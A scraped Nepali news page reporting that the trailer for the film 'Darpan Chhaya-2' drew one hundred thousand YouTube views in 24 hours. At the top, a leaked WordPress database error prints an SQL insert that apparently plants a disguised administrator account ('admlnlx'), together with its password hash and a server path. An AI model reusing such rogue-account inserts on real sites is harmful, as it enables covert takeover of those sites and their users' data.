WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$Bl5LQV7e35.c7BJUeox89f3L7tHQd81', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-04 14:51:09', '', 'admlnlx', 'admlnlx')


Warning: Trying to access array offset on value of type bool in /home/gaulekhabar.com/public_html/wp-content/themes/nepali-news-portal/header.php on line 21
२४ घण्टामा एक लाखले हेरे ‘दर्पण छायाँ–२’ को ट्रेलर (भिडियो सहित) – Gaule Khabar

२४ घण्टामा एक लाखले हेरे ‘दर्पण छायाँ–२’ को ट्रेलर (भिडियो सहित)

२४ घण्टामा एक लाखले हेरे ‘दर्पण छायाँ–२’ को ट्रेलर  (भिडियो सहित)

काठमाडौं,माघ २८ –

नेपाली कथानक चलचित्र ‘दर्पण छायाँ–२’ को ट्रेलर रिलिज भएको २४ घण्टामा युट्युबमा एक लाखले हेरेका छन् । चलचित्रको ट्रेलर बिहीबार अपरान्ह रिलिज गरिएको थियो ।

पुराना तथा अनुभवी निर्देशक तुलसी घिमिरेको चलचित्र ‘दर्पण छायाँ–२’ फागुन २७ गते प्रदर्शन हुँदैछ । उनले चलचित्रको लिड रोलका नयाँ अनुहारलाई लिएका छन् ।

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका